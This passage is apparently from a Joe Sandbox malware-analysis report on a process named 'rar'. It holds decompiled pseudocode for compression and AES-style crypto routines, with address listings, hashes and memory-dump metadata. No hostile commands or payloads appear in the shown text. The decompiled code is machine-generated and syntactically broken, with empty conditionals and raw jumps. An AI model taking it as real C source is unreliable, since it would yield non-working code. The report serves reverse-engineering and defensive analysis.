				_t219 =  *((intOrPtr*)(_t261 + 0x40)) - _t258 - 0x20 + _t223 * 4;
				r11d = r11d +  *((intOrPtr*)(_t258 + _t219 - 0xc));
				if (_t223 + 1 - _t285 < 0) goto 0x50b3abda;
				r9d =  *(_t261 + 0x30);
				r9d =  <  ? 2 << 8 : r9d;
				if (1 - r9d >= 0) goto 0x50b3ac94;
				r9d = r9d - 1;
				 *((intOrPtr*)(_t254 - 4)) = 1;
				 *_t254 = r9d;
				_t254[1] = r10d;
				if (r9d - 0x200 <= 0) goto 0x50b3ac87;
				if (r10d != 1) goto 0x50b3ac33;
				if (r9d - 0x400 <= 0) goto 0x50b3ac87;
				asm("cdq");
				if (r9d / r10d - 0x80 <= 0) goto 0x50b3ac87;
				 *(_t261 + 0x20) = r10d;
				if (E00007FF67FF650B39EF8(r11d, _t223 + 1,  *((intOrPtr*)(_t261 + 0x40)) - _t258 - 0x20, _t254, _t258, (1 << 8) +  *((intOrPtr*)(_t261 + 0x48))) == 0) goto 0x50b3ac87;
				_t125 =  !=  ? r13d : 0;
				 *((intOrPtr*)(_t254 - 8)) =  !=  ? r13d : 0;
				_t221 = _t219 + 2 + (_t219 + 2) * 2;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x38)) + _t221 * 4)) == 3) goto 0x50b3ac87;
				 *_t277 =  *_t277 + 1;
				if (_t221 - _t282 < 0) goto 0x50b3abb7;
				return E00007FF67FF650B69D10( *_t277, 1 << 8,  *(_t258 + 0x3f0) ^ _t261);
			}





































                                                                                                            0x7ff650b3a90c
                                                                                                            0x7ff650b3a90c
                                                                                                            0x7ff650b3a918
                                                                                                            0x7ff650b3a91c
                                                                                                            0x7ff650b3a924
                                                                                                            0x7ff650b3a92b
                                                                                                            0x7ff650b3a935
                                                                                                            0x7ff650b3a93c
                                                                                                            0x7ff650b3a94c
                                                                                                            0x7ff650b3a956
                                                                                                            0x7ff650b3a95b
                                                                                                            0x7ff650b3a95b
                                                                                                            0x7ff650b3a95f
                                                                                                            0x7ff650b3a964
                                                                                                            0x7ff650b3a969
                                                                                                            0x7ff650b3a96e
                                                                                                            0x7ff650b3a970
                                                                                                            0x7ff650b3a977
                                                                                                            0x7ff650b3a979
                                                                                                            0x7ff650b3a97c
                                                                                                            0x7ff650b3a985
                                                                                                            0x7ff650b3a996
                                                                                                            0x7ff650b3a99a
                                                                                                            0x7ff650b3a99d
                                                                                                            0x7ff650b3a9a2
                                                                                                            0x7ff650b3a9a8
                                                                                                            0x7ff650b3a9ad
                                                                                                            0x7ff650b3a9b0
                                                                                                            0x7ff650b3a9b8
                                                                                                            0x7ff650b3a9bf
                                                                                                            0x7ff650b3a9c4
                                                                                                            0x7ff650b3a9ca
                                                                                                            0x7ff650b3a9d2
                                                                                                            0x7ff650b3a9de
                                                                                                            0x7ff650b3a9e5
                                                                                                            0x7ff650b3a9e7
                                                                                                            0x7ff650b3a9ec
                                                                                                            0x7ff650b3a9f1
                                                                                                            0x7ff650b3aa00
                                                                                                            0x7ff650b3aa08
                                                                                                            0x7ff650b3aa0b
                                                                                                            0x7ff650b3aa0e
                                                                                                            0x7ff650b3aa11
                                                                                                            0x7ff650b3aa17
                                                                                                            0x7ff650b3aa19
                                                                                                            0x7ff650b3aa22
                                                                                                            0x7ff650b3aa24
                                                                                                            0x7ff650b3aa2a
                                                                                                            0x7ff650b3aa2c
                                                                                                            0x7ff650b3aa32
                                                                                                            0x7ff650b3aa36
                                                                                                            0x7ff650b3aa39
                                                                                                            0x7ff650b3aa3c
                                                                                                            0x7ff650b3aa3f
                                                                                                            0x7ff650b3aa43
                                                                                                            0x7ff650b3aa4a
                                                                                                            0x7ff650b3aa53
                                                                                                            0x7ff650b3aa55
                                                                                                            0x7ff650b3aa69
                                                                                                            0x7ff650b3aa6f
                                                                                                            0x7ff650b3aa75
                                                                                                            0x7ff650b3aa81
                                                                                                            0x7ff650b3aa87
                                                                                                            0x7ff650b3aa8d
                                                                                                            0x7ff650b3aa91
                                                                                                            0x7ff650b3aa9a
                                                                                                            0x7ff650b3aa9f
                                                                                                            0x7ff650b3aaa4
                                                                                                            0x7ff650b3aaa6
                                                                                                            0x7ff650b3aaa9
                                                                                                            0x7ff650b3aab1
                                                                                                            0x7ff650b3aab8
                                                                                                            0x7ff650b3aaba
                                                                                                            0x7ff650b3aabd
                                                                                                            0x7ff650b3aac6
                                                                                                            0x7ff650b3aacc
                                                                                                            0x7ff650b3aace
                                                                                                            0x7ff650b3aad4
                                                                                                            0x7ff650b3aad7
                                                                                                            0x7ff650b3aada
                                                                                                            0x7ff650b3aadc
                                                                                                            0x7ff650b3aae0
                                                                                                            0x7ff650b3aae9
                                                                                                            0x7ff650b3aaeb
                                                                                                            0x7ff650b3aaf3
                                                                                                            0x7ff650b3aaf5
                                                                                                            0x7ff650b3aaf8
                                                                                                            0x7ff650b3aaf8
                                                                                                            0x7ff650b3ab00
                                                                                                            0x7ff650b3ab09
                                                                                                            0x7ff650b3ab10
                                                                                                            0x7ff650b3ab14
                                                                                                            0x7ff650b3ab1b
                                                                                                            0x7ff650b3ab21
                                                                                                            0x7ff650b3ab26
                                                                                                            0x7ff650b3ab2b
                                                                                                            0x7ff650b3ab2d
                                                                                                            0x7ff650b3ab32
                                                                                                            0x7ff650b3ab34
                                                                                                            0x7ff650b3ab38
                                                                                                            0x7ff650b3ab3d
                                                                                                            0x7ff650b3ab40
                                                                                                            0x7ff650b3ab44
                                                                                                            0x7ff650b3ab48
                                                                                                            0x7ff650b3ab5d
                                                                                                            0x7ff650b3ab6a
                                                                                                            0x7ff650b3ab6c
                                                                                                            0x7ff650b3ab74
                                                                                                            0x7ff650b3ab79
                                                                                                            0x7ff650b3ab7b
                                                                                                            0x7ff650b3ab7e
                                                                                                            0x7ff650b3ab80
                                                                                                            0x7ff650b3ab8b
                                                                                                            0x7ff650b3ab93
                                                                                                            0x7ff650b3ab9d
                                                                                                            0x7ff650b3aba5
                                                                                                            0x7ff650b3aba9
                                                                                                            0x7ff650b3abb0
                                                                                                            0x7ff650b3abb4
                                                                                                            0x7ff650b3abba
                                                                                                            0x7ff650b3abbc
                                                                                                            0x7ff650b3abc6
                                                                                                            0x7ff650b3abcc
                                                                                                            0x7ff650b3abdf
                                                                                                            0x7ff650b3abe1
                                                                                                            0x7ff650b3abe7
                                                                                                            0x7ff650b3abf2
                                                                                                            0x7ff650b3abf4
                                                                                                            0x7ff650b3ac01
                                                                                                            0x7ff650b3ac08
                                                                                                            0x7ff650b3ac0e
                                                                                                            0x7ff650b3ac11
                                                                                                            0x7ff650b3ac14
                                                                                                            0x7ff650b3ac17
                                                                                                            0x7ff650b3ac22
                                                                                                            0x7ff650b3ac28
                                                                                                            0x7ff650b3ac31
                                                                                                            0x7ff650b3ac36
                                                                                                            0x7ff650b3ac3f
                                                                                                            0x7ff650b3ac51
                                                                                                            0x7ff650b3ac5d
                                                                                                            0x7ff650b3ac6a
                                                                                                            0x7ff650b3ac6e
                                                                                                            0x7ff650b3ac75
                                                                                                            0x7ff650b3ac7d
                                                                                                            0x7ff650b3ac7f
                                                                                                            0x7ff650b3ac8e
                                                                                                            0x7ff650b3acbd

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1d0419732a4eb036f81063e79bd64624ab9defcae126b734b892effa47c469f9
                                                                                                            • Instruction ID: f88a69a75ecf778bf2f9a40f07cd4015a6cc01df7a52afa9a3b77918dcf26076
                                                                                                            • Opcode Fuzzy Hash: 1d0419732a4eb036f81063e79bd64624ab9defcae126b734b892effa47c469f9
                                                                                                            • Instruction Fuzzy Hash: 3CB1F3B2B0864257EB24CF14E580AF9B3A5FB9A349F745035DA4FA2B45DE3EE581C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B22E38 Relevance: .3, Instructions: 281COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E00007FF67FF650B22E38(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9) {
				void* _t93;
				void* _t94;
				signed int _t102;
				void* _t108;
				void* _t114;
				void* _t115;
				void* _t116;
				intOrPtr _t118;
				void* _t120;
				intOrPtr _t124;
				signed int _t144;
				void* _t204;
				signed long long _t205;
				signed int _t207;
				signed int _t208;
				void* _t209;
				signed int _t210;
				void* _t212;
				void* _t217;
				void* _t219;
				void* _t221;
				void* _t222;
				intOrPtr* _t230;
				intOrPtr* _t239;
				void* _t250;
				void* _t254;
				void* _t256;
				void* _t257;
				void* _t259;
				signed long long _t260;
				void* _t262;
				void* _t264;
				void* _t266;
				void* _t268;
				void* _t269;
				void* _t271;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t279;
				void* _t281;
				void* _t282;

				_t266 = __r9;
				_t262 = __r8;
				_t245 = __rdx;
				_t204 = _t259;
				 *((long long*)(_t204 + 8)) = __rbx;
				 *((long long*)(_t204 + 0x18)) = __rsi;
				 *((long long*)(_t204 + 0x20)) = __rdi;
				_t257 = _t204 - 0x5f;
				_t260 = _t259 - 0xe0;
				_t205 =  *0x50b978f0; // 0x27db226282f1
				 *(_t257 + 0x2f) = _t205 ^ _t260;
				_t6 = _t245 + 0x18; // -2520
				_t272 = _t6;
				r8d = 0;
				_t275 = __rdx;
				_t7 = _t245 + 0x690; // -864
				_t254 = _t7;
				_t221 = __rcx;
				_t8 = _t262 + 1; // 0x1
				_t144 = _t8;
				E00007FF67FF650B472B0(_t144, __rcx, _t6, _t254, _t279);
				r14d = 0x194;
				if ( *((intOrPtr*)(__rdx + 0x9e8)) - 0x3e8 < 0) goto 0x50b22eb7;
				if ( *((char*)(__rdx + 0x9ec)) != 0) goto 0x50b22eb7;
				r8d = _t144;
				E00007FF67FF650B472B0(_t144, _t221, _t6, _t254, _t277);
				goto 0x50b22ed5;
				r8d = 0;
				_t93 = E00007FF67FF650B472B0(_t144, _t221, _t6, _t254, _t274);
				_t11 = _t275 + 0x851; // -415
				_t94 = E00007FF67FF650B6C1A0(_t93, 0, _t11, __rdx, _t277);
				_t13 = _t245 + 0x50; // 0x50
				r8d = _t13;
				E00007FF67FF650B6C1A0(_t94, 0, _t260 + 0x20, __rdx, _t277);
				r8d = 0;
				r9d = 0x87;
				if (r8d - 0x192 >= 0) goto 0x50b22fa0;
				_t207 = r8d;
				_t118 =  *((intOrPtr*)(_t207 + _t254));
				if (_t118 != 0) goto 0x50b22f49;
				if ( *((intOrPtr*)(_t207 + _t254 + 1)) != _t118) goto 0x50b22f49;
				if ( *((intOrPtr*)(_t207 + _t254 + 2)) != _t118) goto 0x50b22f49;
				r8d = r8d + 3;
				_t208 = r8d;
				if (_t208 - _t277 >= 0) goto 0x50b22f41;
				if ( *((char*)(_t208 + _t254)) != 0) goto 0x50b22f37;
				if (0 - r9d >= 0) goto 0x50b22f37;
				_t120 = 0 + _t144;
				r8d = r8d + _t144;
				_t209 = _t208 + __rdi;
				if (_t209 - _t277 < 0) goto 0x50b22f1f;
				if (_t120 - 7 <= 0) goto 0x50b22f41;
				 *((intOrPtr*)(_t257 - 0x3d)) =  *((intOrPtr*)(_t257 - 0x3d)) + _t144;
				goto 0x50b22f44;
				 *((intOrPtr*)(_t257 - 0x41)) =  *((intOrPtr*)(_t257 - 0x41)) + _t144;
				r8d = r8d - _t144;
				goto 0x50b22fba;
				if (r8d <= 0) goto 0x50b22fa0;
				if (_t120 !=  *((intOrPtr*)(_t209 + _t254 - 1))) goto 0x50b22fa0;
				if (_t120 !=  *((intOrPtr*)(_t209 + _t254 + 1))) goto 0x50b22fa0;
				if (_t120 !=  *((intOrPtr*)(_t209 + _t254 + 2))) goto 0x50b22fa0;
				r8d = r8d + 3;
				_t210 = r8d;
				if (_t210 - _t277 >= 0) goto 0x50b22f9b;
				_t230 = _t210 + _t254;
				if ( *_t230 !=  *((intOrPtr*)(_t230 - 1))) goto 0x50b22f91;
				if (0 - r9d >= 0) goto 0x50b22f91;
				r8d = r8d + _t144;
				_t212 = _t230 + __rdi - _t254;
				if (_t212 - _t277 < 0) goto 0x50b22f72;
				if (0 + _t144 - 7 <= 0) goto 0x50b22f9b;
				 *((intOrPtr*)(_t257 - 0x45)) =  *((intOrPtr*)(_t257 - 0x45)) + _t144;
				goto 0x50b22f44;
				 *((intOrPtr*)(_t257 - 0x49)) =  *((intOrPtr*)(_t257 - 0x49)) + _t144;
				goto 0x50b22f44;
				 *((intOrPtr*)(_t260 + 0x20 + (__rdx - _t212) * 4)) =  *((intOrPtr*)(_t260 + 0x20 + (__rdx - _t212) * 4)) + _t144;
				r8d = r8d + _t144;
				if (r8d - r14d < 0) goto 0x50b22eee;
				r8d = 0x14;
				E00007FF67FF650B22534( *(r8d + __rdx + 0x851) & 0x000000ff, _t260 + 0x20, _t277, _t266);
				_t264 = _t257 + 0x17;
				E00007FF67FF650B385A0(0x14, _t212, _t221, _t260 + 0x20, _t264, _t257 - 0x39, _t268, _t269);
				r15d = 0;
				r14d = 0;
				if (0 - 0x14 >= 0) goto 0x50b2304b;
				_t250 = _t257 + 0x17;
				if ( *((char*)(_t250 + _t221)) != 0) goto 0x50b23023;
				if (_t221 - 0x11 >= 0) goto 0x50b23023;
				r14d = r14d + 1;
				_t222 = _t221 + 1;
				if (1 - 0x14 < 0) goto 0x50b2300a;
				if (_t222 - 3 < 0) goto 0x50b2304b;
				_t51 = _t250 + 0xb; // 0xf
				r8d = _t51;
				E00007FF67FF650B472B0(4, _t222, _t272, _t254, _t271);
				_t52 = _t277 - 2; // -1
				r8d = _t52;
				_t281 = _t279 - 1 + _t222;
				goto 0x50b2306e;
				if (( *(_t257 + _t281 + 0x17) & 0x000000ff) != 0xf) goto 0x50b2306b;
				_t55 = _t250 + 0xb; // 0xf
				r8d = _t55;
				_t102 = E00007FF67FF650B472B0(4, _t222, _t272, _t254, _t256);
				r8d = 0;
				goto 0x50b2306e;
				r8d = _t102;
				E00007FF67FF650B472B0(4, _t222, _t272, _t254);
				r14d = 1;
				_t282 = _t281 + _t277;
				if (0xffffffffffffffff + r14d + r14d - 0x14 < 0) goto 0x50b22ff4;
				r15d = 0x194;
				if (0 - 0x192 >= 0) goto 0x50b23185;
				_t124 =  *((intOrPtr*)(0 + _t254));
				if (_t124 != 0) goto 0x50b2311f;
				if ( *((intOrPtr*)(0 + _t254 + 1)) != _t124) goto 0x50b2311f;
				if ( *((intOrPtr*)(0 + _t254 + 2)) != _t124) goto 0x50b2311f;
				if (3 - _t282 >= 0) goto 0x50b23102;
				if ( *((char*)(3 + _t254)) != 0) goto 0x50b230e3;
				if (0 - 0x87 >= 0) goto 0x50b230e3;
				if (3 - _t282 < 0) goto 0x50b230c7;
				if (0 + r14d - 7 <= 0) goto 0x50b23102;
				r8d =  *(_t257 + 0x13);
				E00007FF67FF650B472B0( *(_t257 + 0x2a) & 0x000000ff, _t222, _t272, _t254);
				goto 0x50b23117;
				r8d =  *(_t257 + 0xf);
				E00007FF67FF650B472B0( *(_t257 + 0x29) & 0x000000ff, _t222, _t272, _t254);
				_t114 = 3 + r14d - r14d;
				goto 0x50b231a8;
				if (_t114 <= 0) goto 0x50b23185;
				if (_t124 !=  *((intOrPtr*)(3 + _t254 - 1))) goto 0x50b23185;
				if (_t124 !=  *((intOrPtr*)(3 + _t254 + 1))) goto 0x50b23185;
				if (_t124 !=  *((intOrPtr*)(3 + _t277 + _t254 + 2))) goto 0x50b23185;
				_t115 = _t114 + 3;
				_t217 = _t115;
				if (_t217 - _t282 >= 0) goto 0x50b2317b;
				_t239 = _t217 + _t254;
				if ( *_t239 !=  *((intOrPtr*)(_t239 - 1))) goto 0x50b23169;
				if (0 - 0x87 >= 0) goto 0x50b23169;
				_t116 = _t115 + r14d;
				_t219 = _t239 + _t277 - _t254;
				if (_t219 - _t282 < 0) goto 0x50b23146;
				if (0 + r14d - 7 <= 0) goto 0x50b2317b;
				r8d =  *(_t257 + 0xb);
				goto 0x50b230f0;
				r8d =  *(_t257 + 7);
				goto 0x50b2310a;
				r8d =  *(_t116 + _t254) & 0x000000ff;
				r8d = r8d & 0x0000000f;
				r8d =  *(_t257 + (_t264 - _t219) * 4 - 0x39);
				_t108 = E00007FF67FF650B472B0( *(_t257 + _t264 - _t219 + 0x17) & 0x000000ff, _t222, _t272, _t254);
				if (_t116 + r14d - r15d < 0) goto 0x50b23098;
				return E00007FF67FF650B69D10(_t108, _t124,  *(_t257 + 0x2f) ^ _t260);
			}













































                                                                                                            0x7ff650b22e38
                                                                                                            0x7ff650b22e38
                                                                                                            0x7ff650b22e38
                                                                                                            0x7ff650b22e38
                                                                                                            0x7ff650b22e3b
                                                                                                            0x7ff650b22e3f
                                                                                                            0x7ff650b22e43
                                                                                                            0x7ff650b22e50
                                                                                                            0x7ff650b22e54
                                                                                                            0x7ff650b22e5b
                                                                                                            0x7ff650b22e65
                                                                                                            0x7ff650b22e69
                                                                                                            0x7ff650b22e69
                                                                                                            0x7ff650b22e6d
                                                                                                            0x7ff650b22e70
                                                                                                            0x7ff650b22e73
                                                                                                            0x7ff650b22e73
                                                                                                            0x7ff650b22e7a
                                                                                                            0x7ff650b22e80
                                                                                                            0x7ff650b22e80
                                                                                                            0x7ff650b22e86
                                                                                                            0x7ff650b22e96
                                                                                                            0x7ff650b22e9c
                                                                                                            0x7ff650b22ea6
                                                                                                            0x7ff650b22ea8
                                                                                                            0x7ff650b22eb0
                                                                                                            0x7ff650b22eb5
                                                                                                            0x7ff650b22eb7
                                                                                                            0x7ff650b22ebf
                                                                                                            0x7ff650b22ec4
                                                                                                            0x7ff650b22ed0
                                                                                                            0x7ff650b22edc
                                                                                                            0x7ff650b22edc
                                                                                                            0x7ff650b22ee0
                                                                                                            0x7ff650b22ee5
                                                                                                            0x7ff650b22ee8
                                                                                                            0x7ff650b22ef5
                                                                                                            0x7ff650b22efb
                                                                                                            0x7ff650b22efe
                                                                                                            0x7ff650b22f03
                                                                                                            0x7ff650b22f09
                                                                                                            0x7ff650b22f0f
                                                                                                            0x7ff650b22f11
                                                                                                            0x7ff650b22f17
                                                                                                            0x7ff650b22f1d
                                                                                                            0x7ff650b22f23
                                                                                                            0x7ff650b22f28
                                                                                                            0x7ff650b22f2a
                                                                                                            0x7ff650b22f2c
                                                                                                            0x7ff650b22f2f
                                                                                                            0x7ff650b22f35
                                                                                                            0x7ff650b22f3a
                                                                                                            0x7ff650b22f3c
                                                                                                            0x7ff650b22f3f
                                                                                                            0x7ff650b22f41
                                                                                                            0x7ff650b22f44
                                                                                                            0x7ff650b22f47
                                                                                                            0x7ff650b22f4c
                                                                                                            0x7ff650b22f52
                                                                                                            0x7ff650b22f58
                                                                                                            0x7ff650b22f5e
                                                                                                            0x7ff650b22f60
                                                                                                            0x7ff650b22f66
                                                                                                            0x7ff650b22f6c
                                                                                                            0x7ff650b22f6e
                                                                                                            0x7ff650b22f77
                                                                                                            0x7ff650b22f7c
                                                                                                            0x7ff650b22f86
                                                                                                            0x7ff650b22f89
                                                                                                            0x7ff650b22f8f
                                                                                                            0x7ff650b22f94
                                                                                                            0x7ff650b22f96
                                                                                                            0x7ff650b22f99
                                                                                                            0x7ff650b22f9b
                                                                                                            0x7ff650b22f9e
                                                                                                            0x7ff650b22fb6
                                                                                                            0x7ff650b22fba
                                                                                                            0x7ff650b22fc0
                                                                                                            0x7ff650b22fd0
                                                                                                            0x7ff650b22fd6
                                                                                                            0x7ff650b22fe1
                                                                                                            0x7ff650b22fea
                                                                                                            0x7ff650b22ff1
                                                                                                            0x7ff650b22ff4
                                                                                                            0x7ff650b22ffe
                                                                                                            0x7ff650b23007
                                                                                                            0x7ff650b2300e
                                                                                                            0x7ff650b23014
                                                                                                            0x7ff650b23016
                                                                                                            0x7ff650b23019
                                                                                                            0x7ff650b23021
                                                                                                            0x7ff650b23027
                                                                                                            0x7ff650b23031
                                                                                                            0x7ff650b23031
                                                                                                            0x7ff650b23035
                                                                                                            0x7ff650b2303c
                                                                                                            0x7ff650b2303c
                                                                                                            0x7ff650b23046
                                                                                                            0x7ff650b23049
                                                                                                            0x7ff650b23053
                                                                                                            0x7ff650b2305d
                                                                                                            0x7ff650b2305d
                                                                                                            0x7ff650b23061
                                                                                                            0x7ff650b23066
                                                                                                            0x7ff650b23069
                                                                                                            0x7ff650b2306b
                                                                                                            0x7ff650b23076
                                                                                                            0x7ff650b2307b
                                                                                                            0x7ff650b23084
                                                                                                            0x7ff650b2308a
                                                                                                            0x7ff650b23092
                                                                                                            0x7ff650b2309e
                                                                                                            0x7ff650b230a7
                                                                                                            0x7ff650b230ac
                                                                                                            0x7ff650b230b2
                                                                                                            0x7ff650b230b8
                                                                                                            0x7ff650b230c5
                                                                                                            0x7ff650b230cb
                                                                                                            0x7ff650b230d3
                                                                                                            0x7ff650b230e1
                                                                                                            0x7ff650b230e6
                                                                                                            0x7ff650b230ec
                                                                                                            0x7ff650b230f3
                                                                                                            0x7ff650b23100
                                                                                                            0x7ff650b23106
                                                                                                            0x7ff650b2310d
                                                                                                            0x7ff650b23117
                                                                                                            0x7ff650b2311a
                                                                                                            0x7ff650b23121
                                                                                                            0x7ff650b23127
                                                                                                            0x7ff650b2312d
                                                                                                            0x7ff650b23133
                                                                                                            0x7ff650b23135
                                                                                                            0x7ff650b2313a
                                                                                                            0x7ff650b23140
                                                                                                            0x7ff650b23142
                                                                                                            0x7ff650b2314b
                                                                                                            0x7ff650b23153
                                                                                                            0x7ff650b2315e
                                                                                                            0x7ff650b23161
                                                                                                            0x7ff650b23167
                                                                                                            0x7ff650b2316c
                                                                                                            0x7ff650b23172
                                                                                                            0x7ff650b23176
                                                                                                            0x7ff650b2317f
                                                                                                            0x7ff650b23183
                                                                                                            0x7ff650b23191
                                                                                                            0x7ff650b23199
                                                                                                            0x7ff650b231a8
                                                                                                            0x7ff650b231ae
                                                                                                            0x7ff650b231b9
                                                                                                            0x7ff650b231eb

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7442e9accafaaa49ed7e043d14afc791060e499b1a9a5cbbd2e08ffd038f4446
                                                                                                            • Instruction ID: 31f0b48d0a4030bda1a8ebbbf07ead5a293b6812748ad6760372fad03c4e7e7d
                                                                                                            • Opcode Fuzzy Hash: 7442e9accafaaa49ed7e043d14afc791060e499b1a9a5cbbd2e08ffd038f4446
                                                                                                            • Instruction Fuzzy Hash: 1EB1F452F1829336FE318B2599913BD26A2AB97B44F5D4135DA4FB2B86CD3FE4418700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B54EC4 Relevance: .3, Instructions: 263COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E00007FF67FF650B54EC4(long long __rbx, char* __rcx, signed int* __rdx, long long __rdi, long long __rsi, unsigned int __r8, void* __r9, long long _a8, long long _a16, void* _a24, long long _a32) {
				void* _v40;
				char _v56;
				void* _v57;
				void* _v58;
				void* _v59;
				void* _v60;
				void* _v61;
				void* _v62;
				void* _v63;
				void* _v64;
				void* _v65;
				void* _v66;
				void* _v67;
				void* _v68;
				void* _v69;
				void* _v70;
				void* _v71;
				char _v72;
				void* _t257;
				intOrPtr _t324;
				char _t375;
				void* _t377;
				void* _t378;
				void* _t380;
				signed long long _t384;
				signed long long _t386;
				signed int* _t390;
				char* _t393;
				signed int* _t394;
				signed long long _t395;
				signed int* _t396;
				signed long long _t397;
				signed int* _t406;
				void* _t408;
				void* _t427;
				signed int* _t436;
				long long _t439;
				intOrPtr* _t443;
				char* _t445;
				unsigned long long _t447;
				void* _t450;
				void* _t455;
				signed int* _t458;

				_t406 = __rdx;
				_t393 = __rcx;
				if (__r8 == 0) goto 0x50b55348;
				_a8 = __rbx;
				_a16 = __rsi;
				_a32 = __rdi;
				_push(_t450);
				_t380 = __r9;
				_t447 = __r8 >> 4;
				_t390 = __rdx;
				_t445 = __rcx;
				if ( *__rcx == 0) goto 0x50b54f0e;
				E00007FF67FF650B5534C(_t257, __rcx, __rdx, _t447, __r9);
				goto 0x50b5532b;
				_t4 = _t393 + 8; // -2708
				_t439 = _t4;
				r12d = 4;
				_a24 = _t439;
				if (_t447 == 0) goto 0x50b55315;
				_t8 = _t380 + 4; // 0x4
				_t458 = _t8;
				_t455 = __rcx -  &_v72;
				_t10 = _t393 + 0x18; // -2692
				_t375 =  *((char*)(__rcx + 1));
				if (_t375 == 0) goto 0x50b54f73;
				_t394 = _t390;
				 *( &_v56 - _t406 + _t394) =  *(_t439 - _t390 + _t394) ^  *_t394;
				_t395 = _t394 + _t450;
				_t408 = _t450 - 1;
				if (_t375 != 0) goto 0x50b54f5f;
				goto 0x50b54f7a;
				asm("movups xmm0, [ebx]");
				asm("movups [ebp-0x10], xmm0");
				_t384 =  &_v56 + _t408;
				 *(_t427 + _t408 - 0x20) =  *(_t10 -  &_v56 + _t384) ^  *_t384;
				if (_t408 + _t450 - 0x10 < 0) goto 0x50b54f86;
				_t21 = _t458 - 4; // 0x0
				_t436 = _t21;
				r12d = 1;
				 *_t436 =  *(0x7ff650b10000 + 0x9bff0 + _t395 * 4) ^  *(0x7ff650b10000 + 0x9c3f0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9c7f0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9cbf0 + _t384 * 4);
				 *_t458 =  *(0x7ff650b10000 + 0x9cbf0 + _t395 * 4) ^  *(0x7ff650b10000 + 0x9bff0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9c3f0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9c7f0 + _t384 * 4);
				_t458[1] =  *(0x7ff650b10000 + 0x9c7f0 + _t395 * 4) ^  *(0x7ff650b10000 + 0x9cbf0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9bff0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9c3f0 + _t384 * 4);
				_t458[2] =  *(0x7ff650b10000 + 0x9c3f0 + _t395 * 4) ^  *(0x7ff650b10000 + 0x9c7f0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9cbf0 + _t384 * 4) ^  *(0x7ff650b10000 + 0x9bff0 + _t384 * 4);
				_t377 = _t395 - 1 - r12d;
				if (_t377 <= 0) goto 0x50b5519a;
				_t89 = _t455 + 0x28; // -2676
				_t396 = _t436;
				 *( &_v72 - __r9 + _t396) =  *(_t89 +  &_v72 - __r9 + _t396) ^  *_t396;
				_t397 =  &(_t396[1]);
				if (_t377 != 0) goto 0x50b5509e;
				r12d = r12d + 1;
